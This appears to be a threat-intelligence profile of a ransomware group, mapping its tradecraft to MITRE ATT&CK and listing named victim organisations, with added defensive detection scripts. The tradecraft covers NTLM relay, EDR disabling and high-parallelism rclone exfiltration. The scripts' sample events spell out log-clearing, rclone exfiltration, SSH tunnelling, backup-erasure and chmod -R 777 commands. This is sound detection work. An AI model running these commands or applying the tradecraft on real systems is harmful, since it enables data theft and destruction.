The Gentlemen
Group profile
The Gentlemen is a RaaS group that emerged in July–August 2025 and rapidly claimed over 320 victims across 17+ countries. It recruits affiliates with a 90% revenue share and deploys a Go-based locker against Windows, Linux, NAS, and BSD systems; a compromised C2 server in 2026 revealed more than 1,570 linked victims.
MITRE ATT&CK TTPs
Initial Access
T1078 Valid Accounts
Use of valid accounts for initial access.
T1078.002 Valid Accounts: Domain Accounts
Use of valid domain accounts for initial access.
T1133 External Remote Services
openconnect used to authenticate to FortiGate SSL VPN (--protocol=fortinet). Actors connect once credentials have been acquired and enumerate internal network routes.
T1190 Exploit Public-Facing Application
Exploitation of public-facing applications for initial access.
T1566 Phishing
Spear-phishing via compromised corporate OWA mailboxes. ZIP payloads containing LNK files disguised as PDF/DOC/XLS, or malicious Office documents, sent from legitimate company email accounts to bypass spam filters.
Execution
T1047 Windows Management Instrumentation
NetExec (nxc) with -X/-x flags for remote PowerShell/CMD execution over WMI/SMB. TrustedSec Titanis used for WMI-based remote execution via NTLM hashes.
T1059 Command and Scripting Interpreter
Use of command and scripting interpreters for execution.
T1059.001 Command and Scripting Interpreter: PowerShell
Use of PowerShell for execution.
T1059.003 Command and Scripting Interpreter: Windows Command Shell
Use of Windows Command Shell for execution.
T1072 Software Deployment Tools
Ransomware locker and EDR killers deployed domain-wide via GPO (deploy_gpo.ps1). GPO configured to run binaries at startup on all domain-joined machines.
Persistence
T1136 Create Account
Creation of accounts for persistence.
T1543 Create or Modify System Process
Velociraptor deployed as a SYSTEM-level Windows service via MSI (Server.Utils.CreateMSI artifact) for persistent beacon access.
T1547 Boot or Logon Autostart Execution
Boot or logon autostart execution for persistence.
Privilege Escalation
T1068 Exploitation for Privilege Escalation
Exploitation of vulnerabilities for privilege escalation.
T1187 Forced Authentication
PetitPotam coercion via NXC coerce_plus module to trigger NTLM authentication from domain hosts toward an attacker-controlled relay listener.
T1557 Adversary-in-the-Middle
Responder (SMB/HTTP disabled) combined with ntlmrelayx targeting LDAP for machine account creation. RelayKing used to scan for SMB/LDAP/MSSQL/HTTP/RPC/WinRM relay opportunities.
Defense Evasion
T1027 Obfuscated Files or Information
Obfuscation of files or information to evade detection.
T1070 Indicator Removal
Automated post-compromise script clears all Windows Event Logs via wevtutil, removes RDP MRU registry keys, deletes .rdp files, empties the Recycle Bin, and clears RDP/SMB/WinRM logs.
T1090 Proxy
ProxyChains (Windows/Linux), SSH dynamic port forwarding (-NfD 1080), ProxyJump multi-hop pivoting. Self-hosted double-VPN with WireGuard/OpenVPN and Amnezia VPN for operator anonymity.
T1112 Modify Registry
Modifying the registry for defense evasion.
T1484.001 Domain Policy Modification: Group Policy Modification
Modification of Group Policy for defense evasion.
T1562 Impair Defenses
Impairing defenses to avoid detection.
T1562.001 Impair Defenses: Disable or Modify Tools
BYOVD drivers (bought on the darknet for $3500-$5000), EDRStartupHinder, GFreeze/GLinker against CrowdStrike, IFEO registry entries redirecting EDR processes to calc.exe, WMI GlobalLogger/WPR symlink attacks to overwrite EDR binaries on boot.
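The IFEO redirect in the T1562.001 entry leaves a durable artifact: a `Debugger` value under an image-name subkey of `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options`. The following is an added defensive example, not code from the page or the group, that audits a `.reg` export of that key (as produced by `reg export`) and flags Debugger values on security-agent processes or pointing at a decoy binary such as calc.exe. The watch-list of agent image names, the decoy list and the sample export are constructed for the example.

```python
import re
from dataclasses import dataclass

IFEO_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
            r"\Image File Execution Options")

# Hypothetical watch-list of security-agent image names; replace with the
# EDR/AV process names used in your estate. Lower-case for comparison.
WATCHED_IMAGES = {"csfalconservice.exe", "msmpeng.exe", "mssense.exe"}

# Binaries that are never a real debugger: an IFEO Debugger pointing here is a
# redirect that prevents the named image from ever starting.
DECOY_BINARIES = {"calc.exe", "cmd.exe", "rundll32.exe", "notepad.exe"}

# Constructed .reg export (not real telemetry) with one redirect of a watched
# agent, one benign GlobalFlag entry, one unknown Debugger and one nested key.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CsFalconService.exe]
"Debugger"="C:\\Windows\\System32\\calc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Program Files\\DevTools\\wrapper.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\PerfOptions]
"CpuPriorityClass"=dword:00000003
"""


@dataclass(frozen=True)
class Finding:
    image: str
    debugger: str
    severity: str
    reason: str


def parse_reg_export(text: str) -> dict:
    """Return {image_name: {value_name: value}} for direct IFEO subkeys.

    Only per-image subkeys are kept; nested keys such as PerfOptions are
    skipped. REG_SZ values are unescaped; other value types are kept raw.
    """
    prefix = (IFEO_KEY + "\\").lower()
    entries, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            tail = key[len(prefix):] if key.lower().startswith(prefix) else None
            if tail and "\\" not in tail:
                current = tail.lower()
                entries[current] = {}
            else:
                current = None
            continue
        if current is None or not line.startswith('"'):
            continue
        name, _, value = line.partition("=")
        name = name.strip('"')
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1].replace("\\\\", "\\")
        entries[current][name] = value
    return entries


def executable_name(path: str) -> str:
    """Basename of the first .exe in a Debugger value (tolerates quotes/args)."""
    m = re.search(r'([^\\/"]+\.exe)\b', path, re.IGNORECASE)
    return m.group(1).lower() if m else path.lower()


def audit_ifeo(entries: dict) -> list:
    """Flag every image that has a Debugger value, graded by what it points at."""
    findings = []
    for image, values in sorted(entries.items()):
        dbg = values.get("Debugger")
        if dbg is None:
            continue
        target = executable_name(dbg)
        if image in WATCHED_IMAGES:
            findings.append(Finding(image, dbg, "high", "Debugger set on a security-agent process"))
        elif target in DECOY_BINARIES:
            findings.append(Finding(image, dbg, "high", f"Debugger redirects to {target}"))
        else:
            findings.append(Finding(image, dbg, "review", "Debugger present; confirm it is an approved tool"))
    return findings


if __name__ == "__main__":
    for f in audit_ifeo(parse_reg_export(SAMPLE_REG)):
        print(f"[{f.severity}] {f.image} -> {f.debugger}: {f.reason}")
```

Run it against a real export by replacing `SAMPLE_REG` with the file contents; any "high" finding on an agent image means the agent is being prevented from starting, which is the condition that precedes locker deployment in this group's intrusions.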
Credential Access
T1003 OS Credential Dumping
XenAllPasswordPro deployed via SMB for mass browser credential harvesting across all hosts. KslDump/KslKatz for LSASS dumping. Velociraptor for full memory dumps without AV detection. Pass-the-Hash via xfreerdp.
T1110 Brute Force
Custom FortiGate panel bruter on dedicated hardware (dual Xeon, 120GB RAM) targeting non-standard ports. Credential spraying with known default passwords. Hydra for email spraying. Hash cracking via crackmd5.ru and chamd5.org.
T1552 Unsecured Credentials
FortiGate configuration files exfiltrated containing plaintext LDAP credentials, local VPN user passwords, and IPSec pre-shared keys. MANSPIDER used to search SMB shares for credential files.
T1555 Credentials from Password Stores
DumpBrowserSecrets used for browser credential and session cookie theft. Cookies imported via the Cookie-Editor extension to hijack authenticated M365/CRM/email sessions.
Discovery
T1018 Remote System Discovery
gogo internal port scanner across /24 subnets (ports 22, 53, 80, 88, 389, 443, 445, 636, 3389, 1433, 5985) with 100 threads and ICMP ping. NetExec for SMB/WinRM/LDAP host enumeration.
T1046 Network Service Discovery
Discovery of network services.
T1069 Permission Groups Discovery
BloodHound/CertiHound for AD and AD CS (ESC1-ESC17) enumeration. ADFind and ldapdomaindump for group/permission mapping. PrivHound for LPE vector identification within AD.
T1087 Account Discovery
Discovery of accounts within the environment.
T1087.002 Account Discovery: Domain Account
Discovery of domain accounts within the environment.
T1482 Domain Trust Discovery
Discovery of domain trust relationships.
T1526 Cloud Service Discovery
AWS S3 buckets and EKS clusters enumerated post-access. Censys, Shodan, ZoomInfo, and the c99.nl API used for external recon of VPN endpoints and subdomains.
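The T1018 entry gives a concrete signature for the internal sweep: one source touching many hosts in a /24 on a fixed set of ports in a short time. The following is an added detection example, not the page's or the group's code, that applies a sliding-window rule to flow records (timestamp, source, destination, destination port): it alerts when one source reaches at least 20 distinct hosts on the listed ports within 60 seconds. The thresholds, the CSV column names and the flow sample are constructed for the example.

```python
import csv
from collections import defaultdict, deque
from io import StringIO

# Ports named in the T1018 entry; only flows to these count toward the rule.
SWEEP_PORTS = {22, 53, 80, 88, 389, 443, 445, 636, 1433, 3389, 5985}

WINDOW_SECONDS = 60          # sliding window per source (assumed tuning value)
DISTINCT_HOST_THRESHOLD = 20  # distinct destinations that trigger an alert


def constructed_flows() -> str:
    """Build a constructed CSV flow sample (not real telemetry).

    One host sweeps 40 addresses in 10.0.7.0/24 in ~20 seconds; a second host
    talks to three servers over several minutes; one flow hits a port outside
    the watched set and must be ignored.
    """
    lines = ["ts,src,dst,dport"]
    ports = sorted(SWEEP_PORTS)
    for i in range(1, 41):
        lines.append(f"{1000 + i // 2},10.0.5.23,10.0.7.{i},{ports[i % len(ports)]}")
    for i, (dst, port) in enumerate([("10.0.7.5", 445), ("10.0.7.6", 389), ("10.0.7.7", 443)]):
        lines.append(f"{1100 + 60 * i},10.0.5.9,{dst},{port}")
    lines.append("1020,10.0.5.23,10.0.7.50,8080")
    return "\n".join(lines)


def parse_flows(csv_text: str) -> list:
    """Parse CSV with columns ts,src,dst,dport into sorted (ts, src, dst, dport) tuples."""
    rows = []
    for r in csv.DictReader(StringIO(csv_text)):
        rows.append((int(r["ts"]), r["src"], r["dst"], int(r["dport"])))
    rows.sort()
    return rows


def detect_sweeps(flows: list, window: int = WINDOW_SECONDS,
                  threshold: int = DISTINCT_HOST_THRESHOLD) -> list:
    """Alert once per source that contacts >= threshold distinct hosts on sweep ports within window."""
    recent = defaultdict(deque)  # src -> deque of (ts, dst, dport) inside the window
    alerted, alerts = set(), []
    for ts, src, dst, dport in flows:
        if dport not in SWEEP_PORTS:
            continue
        q = recent[src]
        q.append((ts, dst, dport))
        while q and ts - q[0][0] > window:   # drop flows older than the window
            q.popleft()
        hosts = {d for _, d, _ in q}
        if len(hosts) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({
                "src": src,
                "first_ts": q[0][0],
                "last_ts": ts,
                "hosts": len(hosts),
                "ports": sorted({p for _, _, p in q}),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_sweeps(parse_flows(constructed_flows())):
        print(f"sweep from {a['src']}: {a['hosts']} hosts on ports {a['ports']} "
              f"between t={a['first_ts']} and t={a['last_ts']}")
```

The rule is deliberately port-gated so that ordinary chatty services (backup agents, monitoring pollers) do not trip it on volume alone; tune the threshold per network segment, and pair it with the NetExec/SMB enumeration the same entry describes, which shows up as many SMB sessions from one workstation in the same window.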
Lateral Movement
T1021 Remote Services
Use of remote services for lateral movement.
T1021.001 Remote Services: Remote Desktop Protocol
Use of RDP for lateral movement.
T1021.002 Remote Services: SMB/Windows Admin Shares
Use of SMB/Windows Admin Shares for lateral movement.
T1021.004 Remote Services: SSH
Use of SSH for lateral movement.
T1563 Remote Service Session Hijacking
Browser session cookies stolen via DumpBrowserSecrets and replayed via Cookie-Editor to hijack authenticated web application sessions (email, M365, CRM portals).
Collection
T1005 Data from Local System
XenAllPasswordPro HTML credential reports collected per host. Full SQL database dumps via phpMyAdmin exported to SFTP. File system enumeration targeting CRM code, backups, and financial data.
T1039 Data from Network Shared Drive
Collection of data from network shared drives.
T1074 Data Staged
Staging of collected data prior to exfiltration.
T1074.001 Data Staged: Local Data Staging
Local staging of collected data prior to exfiltration.
T1114 Email Collection
Corporate OWA mailboxes accessed via purchased stealer logs (snusbase.com) to harvest internal communications, credentials, and sensitive documents.
Exfiltration
T1048 Exfiltration Over Alternative Protocol
Exfiltration of data over encrypted channels.
T1048.001 Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Exfiltration over symmetric encrypted non-C2 channels.
T1537 Transfer Data to Cloud Account
rclone to actor-controlled SFTP servers with high parallelism (--transfers 16 --multi-thread-streams 8 --buffer-size 256M). Observed volumes: 13GB NAS, 3+TB Docker/Nexus, 100+GB Confluence/JIRA.
Command and Control
T1071 Application Layer Protocol
Use of application layer protocols for C2 communication.
T1071.001 Application Layer Protocol: Web Protocols
Use of web protocols for C2 communication.
T1219 Remote Access Software
Use of remote access software for C2.
T1572 Protocol Tunneling
SSH dynamic SOCKS proxies (ssh -NfD 1080) for network pivoting. ProxyChains (Windows/Linux) tunneling attack tools through SOCKS5 proxies acquired from spam/malware affiliates.
T1573 Encrypted Channel
Cloudflare Tunnels blend C2 with legitimate HTTPS traffic. Chisel-ng (Rust, SSH-over-WebSocket-over-TLS) for reverse tunnels. Velociraptor C2 over TLS with signed MSI beacons.
Impact
T1486 Data Encrypted for Impact
Encryption of data for extortion.
T1489 Service Stop
Stopping services to maximize impact.
T1490 Inhibit System Recovery
Veeam backup jobs stopped and tape media fully erased with the long-erase option (Erase-VBRTapeMedium -Long). Docker and QEMU VMs killed pre-encryption. vCenter used to reset ESXi root passwords. Database services (MySQL, PostgreSQL, MongoDB, Redis, MSSQL) stopped before encryption.
T1491 Defacement
Data deleted from CRM web panels and databases. chmod -R 777 applied to NAS filesystems to facilitate locker access and destroy access controls.
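Several entries above (T1070 wevtutil log clearing, T1572 SSH dynamic forwards, T1537 rclone with high parallelism, T1490 Veeam tape erasure, T1489 database service stops, T1491 recursive chmod 777) describe command lines that are visible in process-creation telemetry. The following is an added detection example, not code from the page or the group, that runs one rule per technique over JSON-lines process events. The event field names (host, user, image, cmdline), the rule thresholds and the sample events are constructed; it does not generate the commands, only matches them.

```python
import json
import re
import shlex

# Constructed process-creation events (not real telemetry), shaped like a
# generic EDR/Sysmon export: one matching and one benign line per technique
# where a benign counterpart exists.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"host": "WS01", "user": "CORP\\svc_backup", "image": "wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"host": "WS01", "user": "CORP\\admin", "image": "wevtutil.exe",
     "cmdline": "wevtutil qe Security /c:5"},
    {"host": "NAS01", "user": "root", "image": "rclone",
     "cmdline": "rclone copy /volume1/finance sftp-ext:/in --transfers 16 "
                "--multi-thread-streams 8 --buffer-size 256M"},
    {"host": "SRV02", "user": "CORP\\backupadm", "image": "rclone",
     "cmdline": "rclone ls offsite:"},
    {"host": "JUMP01", "user": "CORP\\jdoe", "image": "ssh.exe",
     "cmdline": "ssh -NfD 1080 user@203.0.113.10"},
    {"host": "VBR01", "user": "CORP\\veeamadm", "image": "powershell.exe",
     "cmdline": "powershell -c Get-VBRTapeMedium | Erase-VBRTapeMedium -Long"},
    {"host": "DB01", "user": "root", "image": "systemctl",
     "cmdline": "systemctl stop postgresql"},
    {"host": "NAS01", "user": "root", "image": "chmod",
     "cmdline": "chmod -R 777 /volume1"},
])

HIGH_PARALLELISM = 8  # assumed threshold for --transfers; tune to your backup jobs


def rclone_high_parallel(cmd: str) -> bool:
    """T1537 heuristic: an rclone transfer with unusually high parallelism."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return False
    if not argv or argv[0].rsplit("/", 1)[-1].lower() not in ("rclone", "rclone.exe"):
        return False
    if "--multi-thread-streams" in argv:
        return True
    for i, a in enumerate(argv):
        if a == "--transfers" and i + 1 < len(argv) and argv[i + 1].isdigit():
            return int(argv[i + 1]) >= HIGH_PARALLELISM
        if a.startswith("--transfers=") and a[len("--transfers="):].isdigit():
            return int(a[len("--transfers="):]) >= HIGH_PARALLELISM
    return False


# (technique id from the profile, short description, matcher over the command line)
RULES = [
    ("T1070", "Windows event log cleared",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b|\bClear-EventLog\b", re.I).search),
    ("T1572", "SSH dynamic SOCKS forward",
     re.compile(r"\bssh(\.exe)?\b.*\s-[A-Za-z]*D\s*\d{2,5}\b").search),
    ("T1490", "Veeam tape media erased",
     re.compile(r"\bErase-VBRTapeMedium\b", re.I).search),
    ("T1489", "database service stopped",
     re.compile(r"\b(net|sc|systemctl)\s+stop\s+\S*(mysql|postgres|mongo|redis|mssql)", re.I).search),
    ("T1491", "recursive world-writable chmod",
     re.compile(r"\bchmod\s+-R\s+0?777\b").search),
    ("T1537", "rclone high-parallelism transfer", rclone_high_parallel),
]


def scan_events(jsonl: str) -> list:
    """Return one hit per (event, rule) pair whose command line matches."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for tid, desc, matcher in RULES:
            if matcher(ev["cmdline"]):
                hits.append({"technique": tid, "desc": desc, "host": ev["host"],
                             "user": ev["user"], "cmdline": ev["cmdline"]})
    return hits


if __name__ == "__main__":
    for h in scan_events(SAMPLE_EVENTS):
        print(f"{h['technique']} {h['host']} {h['user']}: {h['desc']} :: {h['cmdline']}")
```

The T1070 rule should be corroborated with Security event 1102 (audit log cleared), which is written even when the clearing process is not recorded; the rclone and ssh rules are heuristics and will need allow-listing for legitimate backup and administration hosts before they are used for alerting.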
Recent victims
Showing 50 of 517

| Date | Victim | Website | Sector | Country |
|---|---|---|---|---|
| 2026-06-19 | H hiddenn | | Not Found | |
| 2026-06-18 | Vera Chimie Management | verachimie.fr | Manufacturing | FR |
| 2026-06-18 | Alexander Buch Bilanzbuchhalter | buch-bilanzbuchhalter.de | Business Services | DE |
| 2026-06-18 | SGS Malaysia | sgsmalaysia.com | Business Services | MY |
| 2026-06-18 | TERRIO Therapy Fitness | terriotherapy.com | Consumer Services | MX |
| 2026-06-18 | Ty Thac Co | tythac.com.vn | Not Found | VN |
| 2026-06-18 | Amigest | amigest.fr | Agriculture and Food Production | FR |
| 2026-06-18 | Yudu Technology | yudutek.com | Technology | SG |
| 2026-06-18 | Burris MacOmber | burrismacomber.com | Business Services | US |
| 2026-06-18 | Sertrans | sertrans.es | Transportation/Logistics | ES |
| 2026-06-18 | Cofaq | cofaq.fr | Not Found | FR |
| 2026-06-18 | Al Khaja Holding | alkhajaholding.com | Business Services | AE |
| 2026-06-19 | Athens Orthopedic Clinic | athensorthopedicclinic.com | Healthcare | US |
| 2026-06-15 | Enciso Ltda | encisoltda.com | Not Found | CL |
| 2026-06-15 | South Texas Spinal Clinic | spinaldoc.com | Healthcare | US |
| 2026-06-15 | Mahajak Development | mahajak.com | Construction | TH |
| 2026-06-15 | Calipage Humblet | humblet.calipage.be | Not Found | BE |
| 2026-06-15 | Ministarstvo zdravstva Republike Hrvatske | zdravlje.gov.hr | Public Sector | HR |
| 2026-06-15 | Palmer Sicard | palmerandsicard.com | Not Found | |
| 2026-06-15 | Linnecken Partner | linnecken-partner.de | Business Services | DE |
| 2026-06-15 | Centre Medical Crowley | crowleymd.ca | Healthcare | CA |
| 2026-06-15 | Executive Coach | executivecoach.net | Business Services | US |
| 2026-06-15 | Mackay Sugar | mkysugar.com.au | Agriculture and Food Production | AU |
| 2026-06-15 | SigmaControl | sigmacontrol.eu | Technology | NL |
| 2026-06-15 | Buratti | buratti.it | Manufacturing | IT |
| 2026-06-15 | National Museum | natmus.dk | Public Sector | DK |
| 2026-06-15 | Times Software | timesoftsg.com.sg | Technology | SG |
| 2026-06-15 | Traublinger | traublinger.de | Manufacturing | DE |
| 2026-06-15 | Fecovita | fecovita.com | Agriculture and Food Production | AR |
| 2026-06-15 | Constructions Piraino | piraino.fr | Construction | FR |
| 2026-06-15 | Kozminski University | kozminski.edu.pl | Education | PL |
| 2026-06-15 | Cole Manufacturing | colemfg.com | Manufacturing | US |
| 2026-06-15 | Maine Oxy | maineoxy.com | Energy | US |
| 2026-06-15 | Buechel Stone | buechelstone.com | Manufacturing | US |
| 2026-06-10 | UiTM Holdings | uitmholdings.com | Education | MY |
| 2026-06-10 | Scenic Hudson | scenichudson.org | Public Sector | US |
| 2026-06-10 | Silmquinas e Equipamentos | silmaquinas.com.br | Manufacturing | BR |
| 2026-06-10 | T Tokabei Japan | | Consumer Services | JP |
| 2026-06-10 | Allensbach Volunteer | feuerwehr-allensbach.de | Not Found | DE |
| 2026-06-08 | IP Rings | iprings.com | Technology | IE |
| 2026-06-08 | Central Arkansas Pediatrics | central-pediatrics.edan.io | Healthcare | US |
| 2026-06-08 | Metroply | metroply.com | Not Found | |
| 2026-06-08 | Tress | tress.com | Not Found | US |
| 2026-06-08 | Institucion Cervantes | cervantes.edu.ar | Education | AR |
| 2026-06-08 | Empty | empty.es | Not Found | ES |
| 2026-06-08 | Jyharn Electronic | jyharn.com | Manufacturing | TW |
| 2026-06-08 | Trigon America | trigonamerica.com | Not Found | US |
| 2026-06-08 | FESCO Adecco | fescoadecco.com | Business Services | RU |
| 2026-06-08 | The Clinic | wfsportscare.com | Healthcare | GB |
| 2026-06-08 | Integrated Distribution | int-dist.com | Transportation/Logistics | GB |

